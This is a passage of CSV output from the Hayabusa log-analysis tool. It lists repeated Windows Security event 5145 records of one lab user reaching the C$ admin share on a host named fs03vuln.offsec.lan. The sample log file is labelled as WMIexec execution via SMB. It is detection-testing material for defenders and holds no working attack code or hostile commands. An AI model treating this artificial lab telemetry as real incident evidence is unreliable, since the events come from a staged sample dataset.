\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution 
via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 | IP Addr: 10.23.23.9 | 
LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e | IP Addr: 10.23.23.9 
| LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 | IP Addr: 
10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 | IP 
Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c | 
IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff 
| IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 
